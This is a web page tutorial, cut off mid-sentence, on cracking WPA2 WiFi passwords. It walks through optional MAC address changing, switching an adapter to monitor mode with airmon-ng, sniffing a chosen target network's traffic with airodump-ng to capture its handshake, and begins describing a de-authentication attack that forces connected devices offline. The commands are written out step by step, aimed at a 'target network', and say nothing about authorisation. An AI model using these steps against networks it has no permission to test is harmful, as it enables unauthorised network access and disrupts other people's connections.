top of page

Hack WiFi Passwords

Almost all modern-day wifi routers use WPA2 encryption. The WEP connections or WPS-enabled networks were easier to hack into because of the flaws in their design. WPA/WPA2 encryption took care of all these flaws, still, there are ways to get into a network secured by WPA2. The only known practical way to crack a WPA2 encrypted network is through a wordlist/dictionary attack.

Changing MAC Address

Before starting you may want to change your MAC Address. This is an optional step. If you want to change your MAC address, you can follow the steps mentioned in this link

Cracking WPA2

Cracking WPA2 using brute force involves mainly 2 parts:

  1. Capturing Handshake

  2. Running Brute Force on the captured Handshake

Capturing Network Handshake

To send a packet in a network, the packet should have a source MAC address and a destination MAC address. A device will only receive data that has destination MAC as its address. We will exploit this rule to perform de-auth attacks later.

The data packets are literally sent over the air, so if we are in the range of the router, we will be able to capture these packets, so change the wireless interface to monitor mode. By default, it should be in managed mode. To enter monitor mode, run these commands:

Note: To check the name of your wireless network interface run iwconfig. For my case it is wlan1. (Most modern day network adapters support monitor mode. If your adapter does not support monitor mode you can purchase an external adapter that supports this mode)

$ ifconfig wlan1 down
$ airmon-ng check kill
$ airmon-ng start wlan1

The first command `ifconfig wlan1 down` will turn down the wireless adapter. `airmon-ng check kill` will kill any process interfering. You will lose your internet connection but it’s okay. It’s not required for further steps. `airmon-ng start wlan1` will set the `wlan1` interface to monitor mode. You can use `iwconfig` to verify that your adapter is in monitor mode. Note this adapter name. For my case it is `wlan1mon` .

We will use `airodump-ng` for packet sniffing.

$ airodump-ng wlan1mon

We will see output something like this.

Output for ‘airodump-ng wlan1mon'

The ESSID is the name of the network.BSSID is the MAC address of the target network. PWR is the power of the network. Beacons are the frames broadcasted by the network to show its presence. #Data are the number of useful packets sent. CH is the channel number the network works on. MB is the speed supported by the network.

Next, I will run airodump-ng over the network highlighted. Let’s assume this is my target network.

airodump-ng --bssid 60:32:B1:XX:XX:XX --channel 1 --write wpa_handshake wlan1mon

This will store the sniffed data in a file named wpa_handshake. We specified the bssid of the network on which we want to perform the attack and the channel number specified by thechannel argument. The output will look like this:

Output for ‘airodump-ng — bssid 60:32:B1:XX:XX:XX — channel 1 — write wpa_client wlan1mon’

You will see a wpa_handshake-01.cap file is generated which will contain all data transferred to and from the network. The MAC addresses specified in the station are the MAC addresses of the devices connected to the WiFi network.

Now we need to literally wait for some client to connect and airodump-ng will give us the captured handshake.

We can also perform a de-authentication attack which will force the client to disconnect from the wifi network and when we stop the attack, the client will try to connect to the network and we can capture the handshake packet.

To perform a de-auth attack on the client, open another terminal and type the following command, where -a specifies the bssid of the network and -c is the MAC address of the device that we want to deauthenticate.<